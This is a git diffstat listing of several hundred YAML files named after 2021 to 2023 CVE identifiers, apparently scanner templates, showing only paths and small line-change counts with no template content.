http/cves/2021/CVE-2021-34805.yaml | 3 +- http/cves/2021/CVE-2021-35250.yaml | 3 +- http/cves/2021/CVE-2021-35265.yaml | 3 +- http/cves/2021/CVE-2021-35323.yaml | 3 +- http/cves/2021/CVE-2021-35336.yaml | 2 +- http/cves/2021/CVE-2021-35380.yaml | 3 +- http/cves/2021/CVE-2021-35464.yaml | 2 +- http/cves/2021/CVE-2021-35488.yaml | 3 +- http/cves/2021/CVE-2021-35587.yaml | 3 +- http/cves/2021/CVE-2021-36260.yaml | 3 +- http/cves/2021/CVE-2021-36356.yaml | 3 +- http/cves/2021/CVE-2021-36450.yaml | 3 +- http/cves/2021/CVE-2021-3654.yaml | 3 +- http/cves/2021/CVE-2021-36580.yaml | 3 +- http/cves/2021/CVE-2021-36748.yaml | 3 +- http/cves/2021/CVE-2021-36873.yaml | 3 +- http/cves/2021/CVE-2021-37216.yaml | 3 +- http/cves/2021/CVE-2021-37304.yaml | 3 +- http/cves/2021/CVE-2021-37305.yaml | 3 +- http/cves/2021/CVE-2021-37416.yaml | 3 +- http/cves/2021/CVE-2021-37538.yaml | 3 +- http/cves/2021/CVE-2021-37573.yaml | 3 +- http/cves/2021/CVE-2021-37589.yaml | 3 +- http/cves/2021/CVE-2021-37704.yaml | 3 +- http/cves/2021/CVE-2021-37833.yaml | 3 +- http/cves/2021/CVE-2021-38314.yaml | 3 +- http/cves/2021/CVE-2021-38540.yaml | 2 +- http/cves/2021/CVE-2021-38704.yaml | 3 +- http/cves/2021/CVE-2021-38751.yaml | 3 +- http/cves/2021/CVE-2021-39152.yaml | 3 +- http/cves/2021/CVE-2021-39165.yaml | 3 +- http/cves/2021/CVE-2021-39211.yaml | 3 +- http/cves/2021/CVE-2021-39312.yaml | 3 +- http/cves/2021/CVE-2021-39316.yaml | 3 +- http/cves/2021/CVE-2021-39322.yaml | 3 +- http/cves/2021/CVE-2021-39327.yaml | 3 +- http/cves/2021/CVE-2021-39350.yaml | 3 +- http/cves/2021/CVE-2021-39433.yaml | 3 +- http/cves/2021/CVE-2021-39501.yaml | 3 +- http/cves/2021/CVE-2021-40149.yaml | 3 +- http/cves/2021/CVE-2021-40150.yaml | 3 +- http/cves/2021/CVE-2021-40323.yaml | 3 +- http/cves/2021/CVE-2021-40539.yaml | 3 +- http/cves/2021/CVE-2021-40661.yaml | 3 +- http/cves/2021/CVE-2021-40822.yaml | 3 +- http/cves/2021/CVE-2021-40856.yaml | 3 +- http/cves/2021/CVE-2021-40859.yaml | 3 +- http/cves/2021/CVE-2021-40868.yaml | 3 +- http/cves/2021/CVE-2021-40870.yaml | 3 +- http/cves/2021/CVE-2021-40875.yaml | 3 +- http/cves/2021/CVE-2021-40908.yaml | 3 +- http/cves/2021/CVE-2021-40960.yaml | 3 +- http/cves/2021/CVE-2021-40968.yaml | 3 +- http/cves/2021/CVE-2021-40969.yaml | 3 +- http/cves/2021/CVE-2021-40970.yaml | 3 +- http/cves/2021/CVE-2021-40971.yaml | 3 +- http/cves/2021/CVE-2021-40972.yaml | 3 +- http/cves/2021/CVE-2021-40973.yaml | 3 +- http/cves/2021/CVE-2021-40978.yaml | 3 +- http/cves/2021/CVE-2021-41192.yaml | 3 +- http/cves/2021/CVE-2021-41266.yaml | 3 +- http/cves/2021/CVE-2021-41277.yaml | 3 +- http/cves/2021/CVE-2021-41282.yaml | 3 +- http/cves/2021/CVE-2021-41291.yaml | 3 +- http/cves/2021/CVE-2021-41293.yaml | 3 +- http/cves/2021/CVE-2021-41349.yaml | 3 +- http/cves/2021/CVE-2021-41381.yaml | 3 +- http/cves/2021/CVE-2021-41432.yaml | 3 +- http/cves/2021/CVE-2021-41460.yaml | 3 +- http/cves/2021/CVE-2021-41467.yaml | 3 +- http/cves/2021/CVE-2021-41569.yaml | 3 +- http/cves/2021/CVE-2021-41648.yaml | 3 +- http/cves/2021/CVE-2021-41649.yaml | 3 +- http/cves/2021/CVE-2021-41826.yaml | 3 +- http/cves/2021/CVE-2021-4191.yaml | 3 +- http/cves/2021/CVE-2021-41951.yaml | 3 +- http/cves/2021/CVE-2021-42063.yaml | 3 +- http/cves/2021/CVE-2021-42192.yaml | 3 +- http/cves/2021/CVE-2021-42551.yaml | 3 +- http/cves/2021/CVE-2021-42565.yaml | 3 +- http/cves/2021/CVE-2021-42566.yaml | 3 +- http/cves/2021/CVE-2021-42627.yaml | 3 +- http/cves/2021/CVE-2021-42663.yaml | 3 +- http/cves/2021/CVE-2021-42667.yaml | 3 +- http/cves/2021/CVE-2021-42887.yaml | 3 +- http/cves/2021/CVE-2021-43062.yaml | 3 +- http/cves/2021/CVE-2021-43421.yaml | 3 +- http/cves/2021/CVE-2021-43495.yaml | 3 +- http/cves/2021/CVE-2021-43496.yaml | 3 +- http/cves/2021/CVE-2021-43510.yaml | 3 +- http/cves/2021/CVE-2021-43574.yaml | 3 +- http/cves/2021/CVE-2021-43725.yaml | 3 +- http/cves/2021/CVE-2021-43734.yaml | 3 +- http/cves/2021/CVE-2021-43778.yaml | 3 +- http/cves/2021/CVE-2021-43810.yaml | 3 +- http/cves/2021/CVE-2021-44138.yaml | 3 +- http/cves/2021/CVE-2021-44139.yaml | 3 +- http/cves/2021/CVE-2021-44152.yaml | 3 +- http/cves/2021/CVE-2021-44228.yaml | 2 +- http/cves/2021/CVE-2021-44427.yaml | 3 +- http/cves/2021/CVE-2021-44451.yaml | 3 +- http/cves/2021/CVE-2021-44528.yaml | 3 +- http/cves/2021/CVE-2021-44529.yaml | 3 +- http/cves/2021/CVE-2021-44848.yaml | 3 +- http/cves/2021/CVE-2021-45043.yaml | 3 +- http/cves/2021/CVE-2021-45046.yaml | 3 +- http/cves/2021/CVE-2021-45092.yaml | 3 +- http/cves/2021/CVE-2021-45380.yaml | 3 +- http/cves/2021/CVE-2021-45422.yaml | 3 +- http/cves/2021/CVE-2021-45428.yaml | 3 +- http/cves/2021/CVE-2021-45967.yaml | 3 +- http/cves/2021/CVE-2021-45968.yaml | 3 +- http/cves/2021/CVE-2021-46005.yaml | 3 +- http/cves/2021/CVE-2021-46068.yaml | 3 +- http/cves/2021/CVE-2021-46069.yaml | 3 +- http/cves/2021/CVE-2021-46071.yaml | 3 +- http/cves/2021/CVE-2021-46072.yaml | 3 +- http/cves/2021/CVE-2021-46073.yaml | 3 +- http/cves/2021/CVE-2021-46107.yaml | 3 +- http/cves/2021/CVE-2021-46379.yaml | 3 +- http/cves/2021/CVE-2021-46381.yaml | 3 +- http/cves/2021/CVE-2021-46387.yaml | 3 +- http/cves/2021/CVE-2021-46417.yaml | 3 +- http/cves/2021/CVE-2021-46424.yaml | 3 +- http/cves/2021/CVE-2021-46704.yaml | 3 +- http/cves/2022/CVE-2022-0140.yaml | 3 +- http/cves/2022/CVE-2022-0147.yaml | 3 +- http/cves/2022/CVE-2022-0148.yaml | 3 +- http/cves/2022/CVE-2022-0149.yaml | 3 +- http/cves/2022/CVE-2022-0150.yaml | 3 +- http/cves/2022/CVE-2022-0165.yaml | 3 +- http/cves/2022/CVE-2022-0169.yaml | 3 +- http/cves/2022/CVE-2022-0189.yaml | 3 +- http/cves/2022/CVE-2022-0201.yaml | 3 +- http/cves/2022/CVE-2022-0206.yaml | 3 +- http/cves/2022/CVE-2022-0208.yaml | 3 +- http/cves/2022/CVE-2022-0212.yaml | 3 +- http/cves/2022/CVE-2022-0218.yaml | 3 +- http/cves/2022/CVE-2022-0220.yaml | 3 +- http/cves/2022/CVE-2022-0228.yaml | 3 +- http/cves/2022/CVE-2022-0234.yaml | 3 +- http/cves/2022/CVE-2022-0271.yaml | 3 +- http/cves/2022/CVE-2022-0281.yaml | 3 +- http/cves/2022/CVE-2022-0288.yaml | 3 +- http/cves/2022/CVE-2022-0346.yaml | 3 +- http/cves/2022/CVE-2022-0349.yaml | 3 +- http/cves/2022/CVE-2022-0378.yaml | 3 +- http/cves/2022/CVE-2022-0381.yaml | 3 +- http/cves/2022/CVE-2022-0412.yaml | 3 +- http/cves/2022/CVE-2022-0415.yaml | 3 +- http/cves/2022/CVE-2022-0422.yaml | 3 +- http/cves/2022/CVE-2022-0432.yaml | 3 +- http/cves/2022/CVE-2022-0434.yaml | 3 +- http/cves/2022/CVE-2022-0437.yaml | 3 +- http/cves/2022/CVE-2022-0441.yaml | 3 +- http/cves/2022/CVE-2022-0482.yaml | 3 +- http/cves/2022/CVE-2022-0533.yaml | 3 +- http/cves/2022/CVE-2022-0535.yaml | 3 +- http/cves/2022/CVE-2022-0540.yaml | 3 +- http/cves/2022/CVE-2022-0591.yaml | 3 +- http/cves/2022/CVE-2022-0594.yaml | 3 +- http/cves/2022/CVE-2022-0595.yaml | 3 +- http/cves/2022/CVE-2022-0597.yaml | 3 +- http/cves/2022/CVE-2022-0599.yaml | 3 +- http/cves/2022/CVE-2022-0651.yaml | 3 +- http/cves/2022/CVE-2022-0653.yaml | 3 +- http/cves/2022/CVE-2022-0656.yaml | 3 +- http/cves/2022/CVE-2022-0658.yaml | 3 +- http/cves/2022/CVE-2022-0660.yaml | 3 +- http/cves/2022/CVE-2022-0678.yaml | 3 +- http/cves/2022/CVE-2022-0679.yaml | 3 +- http/cves/2022/CVE-2022-0692.yaml | 3 +- http/cves/2022/CVE-2022-0693.yaml | 3 +- http/cves/2022/CVE-2022-0735.yaml | 3 +- http/cves/2022/CVE-2022-0747.yaml | 3 +- http/cves/2022/CVE-2022-0760.yaml | 3 +- http/cves/2022/CVE-2022-0769.yaml | 3 +- http/cves/2022/CVE-2022-0773.yaml | 3 +- http/cves/2022/CVE-2022-0776.yaml | 3 +- http/cves/2022/CVE-2022-0784.yaml | 3 +- http/cves/2022/CVE-2022-0785.yaml | 3 +- http/cves/2022/CVE-2022-0786.yaml | 3 +- http/cves/2022/CVE-2022-0788.yaml | 3 +- http/cves/2022/CVE-2022-0814.yaml | 3 +- http/cves/2022/CVE-2022-0817.yaml | 3 +- http/cves/2022/CVE-2022-0826.yaml | 3 +- http/cves/2022/CVE-2022-0827.yaml | 3 +- http/cves/2022/CVE-2022-0846.yaml | 3 +- http/cves/2022/CVE-2022-0864.yaml | 3 +- http/cves/2022/CVE-2022-0867.yaml | 3 +- http/cves/2022/CVE-2022-0869.yaml | 3 +- http/cves/2022/CVE-2022-0870.yaml | 3 +- http/cves/2022/CVE-2022-0899.yaml | 3 +- http/cves/2022/CVE-2022-0928.yaml | 3 +- http/cves/2022/CVE-2022-0948.yaml | 3 +- http/cves/2022/CVE-2022-0949.yaml | 3 +- http/cves/2022/CVE-2022-0952.yaml | 3 +- http/cves/2022/CVE-2022-0954.yaml | 3 +- http/cves/2022/CVE-2022-0963.yaml | 3 +- http/cves/2022/CVE-2022-0968.yaml | 3 +- http/cves/2022/CVE-2022-1007.yaml | 3 +- http/cves/2022/CVE-2022-1013.yaml | 3 +- http/cves/2022/CVE-2022-1020.yaml | 3 +- http/cves/2022/CVE-2022-1054.yaml | 3 +- http/cves/2022/CVE-2022-1057.yaml | 3 +- http/cves/2022/CVE-2022-1058.yaml | 3 +- http/cves/2022/CVE-2022-1119.yaml | 3 +- http/cves/2022/CVE-2022-1162.yaml | 3 +- http/cves/2022/CVE-2022-1168.yaml | 3 +- http/cves/2022/CVE-2022-1221.yaml | 3 +- http/cves/2022/CVE-2022-1329.yaml | 3 +- http/cves/2022/CVE-2022-1390.yaml | 3 +- http/cves/2022/CVE-2022-1391.yaml | 3 +- http/cves/2022/CVE-2022-1392.yaml | 3 +- http/cves/2022/CVE-2022-1398.yaml | 3 +- http/cves/2022/CVE-2022-1439.yaml | 3 +- http/cves/2022/CVE-2022-1442.yaml | 3 +- http/cves/2022/CVE-2022-1574.yaml | 3 +- http/cves/2022/CVE-2022-1595.yaml | 3 +- http/cves/2022/CVE-2022-1597.yaml | 3 +- http/cves/2022/CVE-2022-1598.yaml | 3 +- http/cves/2022/CVE-2022-1713.yaml | 3 +- http/cves/2022/CVE-2022-1724.yaml | 3 +- http/cves/2022/CVE-2022-1756.yaml | 3 +- http/cves/2022/CVE-2022-1815.yaml | 3 +- http/cves/2022/CVE-2022-1883.yaml | 3 +- http/cves/2022/CVE-2022-1903.yaml | 3 +- http/cves/2022/CVE-2022-1904.yaml | 3 +- http/cves/2022/CVE-2022-1906.yaml | 3 +- http/cves/2022/CVE-2022-1910.yaml | 3 +- http/cves/2022/CVE-2022-1916.yaml | 3 +- http/cves/2022/CVE-2022-1933.yaml | 3 +- http/cves/2022/CVE-2022-1937.yaml | 3 +- http/cves/2022/CVE-2022-1946.yaml | 3 +- http/cves/2022/CVE-2022-1952.yaml | 3 +- http/cves/2022/CVE-2022-2034.yaml | 3 +- http/cves/2022/CVE-2022-21371.yaml | 3 +- http/cves/2022/CVE-2022-21500.yaml | 3 +- http/cves/2022/CVE-2022-21705.yaml | 2 +- http/cves/2022/CVE-2022-2174.yaml | 3 +- http/cves/2022/CVE-2022-2185.yaml | 3 +- http/cves/2022/CVE-2022-2187.yaml | 3 +- http/cves/2022/CVE-2022-2219.yaml | 3 +- http/cves/2022/CVE-2022-22242.yaml | 3 +- http/cves/2022/CVE-2022-22536.yaml | 3 +- http/cves/2022/CVE-2022-22733.yaml | 3 +- http/cves/2022/CVE-2022-22897.yaml | 3 +- http/cves/2022/CVE-2022-2290.yaml | 3 +- http/cves/2022/CVE-2022-22947.yaml | 5 +- http/cves/2022/CVE-2022-22954.yaml | 3 +- http/cves/2022/CVE-2022-22965.yaml | 3 +- http/cves/2022/CVE-2022-22972.yaml | 3 +- http/cves/2022/CVE-2022-23102.yaml | 3 +- http/cves/2022/CVE-2022-23131.yaml | 3 +- http/cves/2022/CVE-2022-23134.yaml | 3 +- http/cves/2022/CVE-2022-23178.yaml | 3 +- http/cves/2022/CVE-2022-23347.yaml | 3 +- http/cves/2022/CVE-2022-23348.yaml | 3 +- http/cves/2022/CVE-2022-23544.yaml | 3 +- http/cves/2022/CVE-2022-2373.yaml | 3 +- http/cves/2022/CVE-2022-2376.yaml | 3 +- http/cves/2022/CVE-2022-23779.yaml | 3 +- http/cves/2022/CVE-2022-2379.yaml | 3 +- http/cves/2022/CVE-2022-23808.yaml | 3 +- http/cves/2022/CVE-2022-2383.yaml | 3 +- http/cves/2022/CVE-2022-23854.yaml | 5 +- http/cves/2022/CVE-2022-23881.yaml | 3 +- http/cves/2022/CVE-2022-23898.yaml | 3 +- http/cves/2022/CVE-2022-23944.yaml | 3 +- http/cves/2022/CVE-2022-24112.yaml | 3 +- http/cves/2022/CVE-2022-24124.yaml | 3 +- http/cves/2022/CVE-2022-24129.yaml | 3 +- http/cves/2022/CVE-2022-2414.yaml | 3 +- http/cves/2022/CVE-2022-24181.yaml | 3 +- http/cves/2022/CVE-2022-24223.yaml | 3 +- http/cves/2022/CVE-2022-24260.yaml | 3 +- http/cves/2022/CVE-2022-24264.yaml | 3 +- http/cves/2022/CVE-2022-24265.yaml | 3 +- http/cves/2022/CVE-2022-24266.yaml | 3 +- http/cves/2022/CVE-2022-24384.yaml | 3 +- http/cves/2022/CVE-2022-2462.yaml | 3 +- http/cves/2022/CVE-2022-2467.yaml | 3 +- http/cves/2022/CVE-2022-24681.yaml | 3 +- http/cves/2022/CVE-2022-24716.yaml | 3 +- http/cves/2022/CVE-2022-24856.yaml | 3 +- http/cves/2022/CVE-2022-24899.yaml | 3 +- http/cves/2022/CVE-2022-24900.yaml | 3 +- http/cves/2022/CVE-2022-24990.yaml | 3 +- http/cves/2022/CVE-2022-25082.yaml | 3 +- http/cves/2022/CVE-2022-25125.yaml | 3 +- http/cves/2022/CVE-2022-25148.yaml | 3 +- http/cves/2022/CVE-2022-25149.yaml | 3 +- http/cves/2022/CVE-2022-25216.yaml | 3 +- http/cves/2022/CVE-2022-25323.yaml | 3 +- http/cves/2022/CVE-2022-2535.yaml | 3 +- http/cves/2022/CVE-2022-2546.yaml | 3 +- http/cves/2022/CVE-2022-25481.yaml | 3 +- http/cves/2022/CVE-2022-25486.yaml | 3 +- http/cves/2022/CVE-2022-25488.yaml | 3 +- http/cves/2022/CVE-2022-25489.yaml | 3 +- http/cves/2022/CVE-2022-25497.yaml | 3 +- http/cves/2022/CVE-2022-2551.yaml | 3 +- http/cves/2022/CVE-2022-25568.yaml | 3 +- http/cves/2022/CVE-2022-2599.yaml | 3 +- http/cves/2022/CVE-2022-26138.yaml | 3 +- http/cves/2022/CVE-2022-26148.yaml | 3 +- http/cves/2022/CVE-2022-26233.yaml | 3 +- http/cves/2022/CVE-2022-26263.yaml | 3 +- http/cves/2022/CVE-2022-2627.yaml | 3 +- http/cves/2022/CVE-2022-2633.yaml | 5 +- http/cves/2022/CVE-2022-26564.yaml | 3 +- http/cves/2022/CVE-2022-26833.yaml | 3 +- http/cves/2022/CVE-2022-2733.yaml | 3 +- http/cves/2022/CVE-2022-2756.yaml | 3 +- http/cves/2022/CVE-2022-27593.yaml | 3 +- http/cves/2022/CVE-2022-27849.yaml | 3 +- http/cves/2022/CVE-2022-27926.yaml | 3 +- http/cves/2022/CVE-2022-27927.yaml | 3 +- http/cves/2022/CVE-2022-27984.yaml | 3 +- http/cves/2022/CVE-2022-27985.yaml | 3 +- http/cves/2022/CVE-2022-28022.yaml | 3 +- http/cves/2022/CVE-2022-28023.yaml | 3 +- http/cves/2022/CVE-2022-28032.yaml | 3 +- http/cves/2022/CVE-2022-28079.yaml | 3 +- http/cves/2022/CVE-2022-28080.yaml | 3 +- http/cves/2022/CVE-2022-28117.yaml | 3 +- http/cves/2022/CVE-2022-28290.yaml | 3 +- http/cves/2022/CVE-2022-28363.yaml | 3 +- http/cves/2022/CVE-2022-28365.yaml | 3 +- http/cves/2022/CVE-2022-2863.yaml | 3 +- http/cves/2022/CVE-2022-28923.yaml | 3 +- http/cves/2022/CVE-2022-28955.yaml | 3 +- http/cves/2022/CVE-2022-29004.yaml | 3 +- http/cves/2022/CVE-2022-29005.yaml | 3 +- http/cves/2022/CVE-2022-29014.yaml | 3 +- http/cves/2022/CVE-2022-29078.yaml | 3 +- http/cves/2022/CVE-2022-29153.yaml | 3 +- http/cves/2022/CVE-2022-29272.yaml | 3 +- http/cves/2022/CVE-2022-29298.yaml | 3 +- http/cves/2022/CVE-2022-29349.yaml | 3 +- http/cves/2022/CVE-2022-29383.yaml | 3 +- http/cves/2022/CVE-2022-29455.yaml | 3 +- http/cves/2022/CVE-2022-29464.yaml | 3 +- http/cves/2022/CVE-2022-29548.yaml | 3 +- http/cves/2022/CVE-2022-29775.yaml | 3 +- http/cves/2022/CVE-2022-30489.yaml | 3 +- http/cves/2022/CVE-2022-30512.yaml | 3 +- http/cves/2022/CVE-2022-30513.yaml | 3 +- http/cves/2022/CVE-2022-30514.yaml | 3 +- http/cves/2022/CVE-2022-3062.yaml | 3 +- http/cves/2022/CVE-2022-30776.yaml | 3 +- http/cves/2022/CVE-2022-30777.yaml | 3 +- http/cves/2022/CVE-2022-31126.yaml | 3 +- http/cves/2022/CVE-2022-31268.yaml | 3 +- http/cves/2022/CVE-2022-31269.yaml | 3 +- http/cves/2022/CVE-2022-31299.yaml | 3 +- http/cves/2022/CVE-2022-31373.yaml | 3 +- http/cves/2022/CVE-2022-3142.yaml | 3 +- http/cves/2022/CVE-2022-31474.yaml | 3 +- http/cves/2022/CVE-2022-31499.yaml | 3 +- http/cves/2022/CVE-2022-31656.yaml | 3 +- http/cves/2022/CVE-2022-31798.yaml | 3 +- http/cves/2022/CVE-2022-31814.yaml | 3 +- http/cves/2022/CVE-2022-31845.yaml | 3 +- http/cves/2022/CVE-2022-31846.yaml | 3 +- http/cves/2022/CVE-2022-31847.yaml | 3 +- http/cves/2022/CVE-2022-31854.yaml | 3 +- http/cves/2022/CVE-2022-31879.yaml | 3 +- http/cves/2022/CVE-2022-31974.yaml | 3 +- http/cves/2022/CVE-2022-31975.yaml | 3 +- http/cves/2022/CVE-2022-31976.yaml | 3 +- http/cves/2022/CVE-2022-31977.yaml | 3 +- http/cves/2022/CVE-2022-31978.yaml | 3 +- http/cves/2022/CVE-2022-31980.yaml | 3 +- http/cves/2022/CVE-2022-31981.yaml | 3 +- http/cves/2022/CVE-2022-31982.yaml | 3 +- http/cves/2022/CVE-2022-31983.yaml | 3 +- http/cves/2022/CVE-2022-31984.yaml | 3 +- http/cves/2022/CVE-2022-32007.yaml | 3 +- http/cves/2022/CVE-2022-32015.yaml | 3 +- http/cves/2022/CVE-2022-32018.yaml | 3 +- http/cves/2022/CVE-2022-32022.yaml | 3 +- http/cves/2022/CVE-2022-32024.yaml | 3 +- http/cves/2022/CVE-2022-32025.yaml | 3 +- http/cves/2022/CVE-2022-32026.yaml | 3 +- http/cves/2022/CVE-2022-32028.yaml | 3 +- http/cves/2022/CVE-2022-32094.yaml | 3 +- http/cves/2022/CVE-2022-32195.yaml | 3 +- http/cves/2022/CVE-2022-32409.yaml | 3 +- http/cves/2022/CVE-2022-3242.yaml | 5 +- http/cves/2022/CVE-2022-32429.yaml | 3 +- http/cves/2022/CVE-2022-32444.yaml | 3 +- http/cves/2022/CVE-2022-32770.yaml | 3 +- http/cves/2022/CVE-2022-32771.yaml | 3 +- http/cves/2022/CVE-2022-32772.yaml | 3 +- http/cves/2022/CVE-2022-33119.yaml | 3 +- http/cves/2022/CVE-2022-33174.yaml | 3 +- http/cves/2022/CVE-2022-33891.yaml | 3 +- http/cves/2022/CVE-2022-33901.yaml | 3 +- http/cves/2022/CVE-2022-33965.yaml | 3 +- http/cves/2022/CVE-2022-34045.yaml | 3 +- http/cves/2022/CVE-2022-34046.yaml | 3 +- http/cves/2022/CVE-2022-34047.yaml | 3 +- http/cves/2022/CVE-2022-34048.yaml | 3 +- http/cves/2022/CVE-2022-34093.yaml | 3 +- http/cves/2022/CVE-2022-34094.yaml | 3 +- http/cves/2022/CVE-2022-34121.yaml | 3 +- http/cves/2022/CVE-2022-34328.yaml | 3 +- http/cves/2022/CVE-2022-34576.yaml | 3 +- http/cves/2022/CVE-2022-34590.yaml | 3 +- http/cves/2022/CVE-2022-34753.yaml | 3 +- http/cves/2022/CVE-2022-3484.yaml | 3 +- http/cves/2022/CVE-2022-3506.yaml | 3 +- http/cves/2022/CVE-2022-35151.yaml | 3 +- http/cves/2022/CVE-2022-35405.yaml | 3 +- http/cves/2022/CVE-2022-35413.yaml | 3 +- http/cves/2022/CVE-2022-35416.yaml | 3 +- http/cves/2022/CVE-2022-35493.yaml | 3 +- http/cves/2022/CVE-2022-3578.yaml | 3 +- http/cves/2022/CVE-2022-35914.yaml | 3 +- http/cves/2022/CVE-2022-36642.yaml | 3 +- http/cves/2022/CVE-2022-36883.yaml | 3 +- http/cves/2022/CVE-2022-37042.yaml | 3 +- http/cves/2022/CVE-2022-37153.yaml | 3 +- http/cves/2022/CVE-2022-37190.yaml | 3 +- http/cves/2022/CVE-2022-37191.yaml | 3 +- http/cves/2022/CVE-2022-37299.yaml | 3 +- http/cves/2022/CVE-2022-3800.yaml | 3 +- http/cves/2022/CVE-2022-38295.yaml | 3 +- http/cves/2022/CVE-2022-38296.yaml | 3 +- http/cves/2022/CVE-2022-38463.yaml | 3 +- http/cves/2022/CVE-2022-38467.yaml | 3 +- http/cves/2022/CVE-2022-38553.yaml | 3 +- http/cves/2022/CVE-2022-38637.yaml | 3 +- http/cves/2022/CVE-2022-38794.yaml | 3 +- http/cves/2022/CVE-2022-38817.yaml | 3 +- http/cves/2022/CVE-2022-38870.yaml | 3 +- http/cves/2022/CVE-2022-39048.yaml | 3 +- http/cves/2022/CVE-2022-3908.yaml | 3 +- http/cves/2022/CVE-2022-39195.yaml | 3 +- http/cves/2022/CVE-2022-3933.yaml | 3 +- http/cves/2022/CVE-2022-3934.yaml | 3 +- http/cves/2022/CVE-2022-3980.yaml | 3 +- http/cves/2022/CVE-2022-3982.yaml | 3 +- http/cves/2022/CVE-2022-39952.yaml | 3 +- http/cves/2022/CVE-2022-39960.yaml | 3 +- http/cves/2022/CVE-2022-39986.yaml | 3 +- http/cves/2022/CVE-2022-40022.yaml | 3 +- http/cves/2022/CVE-2022-40032.yaml | 3 +- http/cves/2022/CVE-2022-40047.yaml | 3 +- http/cves/2022/CVE-2022-40083.yaml | 3 +- http/cves/2022/CVE-2022-40127.yaml | 3 +- http/cves/2022/CVE-2022-40359.yaml | 3 +- http/cves/2022/CVE-2022-4049.yaml | 3 +- http/cves/2022/CVE-2022-4050.yaml | 3 +- http/cves/2022/CVE-2022-4057.yaml | 3 +- http/cves/2022/CVE-2022-4059.yaml | 3 +- http/cves/2022/CVE-2022-4060.yaml | 3 +- http/cves/2022/CVE-2022-4063.yaml | 3 +- http/cves/2022/CVE-2022-40684.yaml | 3 +- http/cves/2022/CVE-2022-40734.yaml | 3 +- http/cves/2022/CVE-2022-40879.yaml | 3 +- http/cves/2022/CVE-2022-4117.yaml | 3 +- http/cves/2022/CVE-2022-4140.yaml | 3 +- http/cves/2022/CVE-2022-41441.yaml | 3 +- http/cves/2022/CVE-2022-41473.yaml | 3 +- http/cves/2022/CVE-2022-41840.yaml | 3 +- http/cves/2022/CVE-2022-42094.yaml | 3 +- http/cves/2022/CVE-2022-42095.yaml | 3 +- http/cves/2022/CVE-2022-42096.yaml | 3 +- http/cves/2022/CVE-2022-4260.yaml | 3 +- http/cves/2022/CVE-2022-42746.yaml | 3 +- http/cves/2022/CVE-2022-42747.yaml | 3 +- http/cves/2022/CVE-2022-42748.yaml | 3 +- http/cves/2022/CVE-2022-42749.yaml | 3 +- http/cves/2022/CVE-2022-4295.yaml | 3 +- http/cves/2022/CVE-2022-4301.yaml | 3 +- http/cves/2022/CVE-2022-43014.yaml | 3 +- http/cves/2022/CVE-2022-43015.yaml | 3 +- http/cves/2022/CVE-2022-43016.yaml | 3 +- http/cves/2022/CVE-2022-43017.yaml | 3 +- http/cves/2022/CVE-2022-43018.yaml | 3 +- http/cves/2022/CVE-2022-4305.yaml | 3 +- http/cves/2022/CVE-2022-4306.yaml | 3 +- http/cves/2022/CVE-2022-43164.yaml | 3 +- http/cves/2022/CVE-2022-43165.yaml | 3 +- http/cves/2022/CVE-2022-43166.yaml | 3 +- http/cves/2022/CVE-2022-43167.yaml | 3 +- http/cves/2022/CVE-2022-43169.yaml | 3 +- http/cves/2022/CVE-2022-43170.yaml | 3 +- http/cves/2022/CVE-2022-43185.yaml | 3 +- http/cves/2022/CVE-2022-4320.yaml | 3 +- http/cves/2022/CVE-2022-4321.yaml | 3 +- http/cves/2022/CVE-2022-4325.yaml | 3 +- http/cves/2022/CVE-2022-43769.yaml | 3 +- http/cves/2022/CVE-2022-4447.yaml | 3 +- http/cves/2022/CVE-2022-44877.yaml | 3 +- http/cves/2022/CVE-2022-44944.yaml | 3 +- http/cves/2022/CVE-2022-44946.yaml | 3 +- http/cves/2022/CVE-2022-44947.yaml | 3 +- http/cves/2022/CVE-2022-44948.yaml | 3 +- http/cves/2022/CVE-2022-44949.yaml | 3 +- http/cves/2022/CVE-2022-44950.yaml | 3 +- http/cves/2022/CVE-2022-44951.yaml | 3 +- http/cves/2022/CVE-2022-44952.yaml | 3 +- http/cves/2022/CVE-2022-44957.yaml | 3 +- http/cves/2022/CVE-2022-45037.yaml | 3 +- http/cves/2022/CVE-2022-45038.yaml | 3 +- http/cves/2022/CVE-2022-45917.yaml | 3 +- http/cves/2022/CVE-2022-45933.yaml | 3 +- http/cves/2022/CVE-2022-46020.yaml | 3 +- http/cves/2022/CVE-2022-46071.yaml | 3 +- http/cves/2022/CVE-2022-46073.yaml | 3 +- http/cves/2022/CVE-2022-46169.yaml | 3 +- http/cves/2022/CVE-2022-46381.yaml | 3 +- http/cves/2022/CVE-2022-46443.yaml | 3 +- http/cves/2022/CVE-2022-46463.yaml | 3 +- http/cves/2022/CVE-2022-46888.yaml | 3 +- http/cves/2022/CVE-2022-46934.yaml | 3 +- http/cves/2022/CVE-2022-47002.yaml | 3 +- http/cves/2022/CVE-2022-47003.yaml | 3 +- http/cves/2022/CVE-2022-47075.yaml | 3 +- http/cves/2022/CVE-2022-47945.yaml | 3 +- http/cves/2022/CVE-2022-47966.yaml | 3 +- http/cves/2022/CVE-2022-47986.yaml | 3 +- http/cves/2022/CVE-2022-48012.yaml | 3 +- http/cves/2022/CVE-2022-48165.yaml | 3 +- http/cves/2022/CVE-2022-48197.yaml | 3 +- http/cves/2022/CVE-2022-4897.yaml | 3 +- http/cves/2023/CVE-2023-0099.yaml | 3 +- http/cves/2023/CVE-2023-0126.yaml | 3 +- http/cves/2023/CVE-2023-0236.yaml | 3 +- http/cves/2023/CVE-2023-0261.yaml | 3 +- http/cves/2023/CVE-2023-0297.yaml | 3 +- http/cves/2023/CVE-2023-0334.yaml | 3 +- http/cves/2023/CVE-2023-0448.yaml | 3 +- http/cves/2023/CVE-2023-0514.yaml | 3 +- http/cves/2023/CVE-2023-0527.yaml | 3 +- http/cves/2023/CVE-2023-0552.yaml | 3 +- http/cves/2023/CVE-2023-0562.yaml | 3 +- http/cves/2023/CVE-2023-0563.yaml | 3 +- http/cves/2023/CVE-2023-0600.yaml | 3 +- http/cves/2023/CVE-2023-0602.yaml | 3 +- http/cves/2023/CVE-2023-0630.yaml | 3 +- http/cves/2023/CVE-2023-0669.yaml | 3 +- http/cves/2023/CVE-2023-0777.yaml | 3 +- http/cves/2023/CVE-2023-0900.yaml | 3 +- http/cves/2023/CVE-2023-0942.yaml | 3 +- http/cves/2023/CVE-2023-0947.yaml | 3 +- http/cves/2023/CVE-2023-0948.yaml | 3 +- http/cves/2023/CVE-2023-0968.yaml | 3 +- http/cves/2023/CVE-2023-1020.yaml | 3 +- http/cves/2023/CVE-2023-1080.yaml | 3 +- http/cves/2023/CVE-2023-1177.yaml | 3 +- http/cves/2023/CVE-2023-1263.yaml | 3 +- 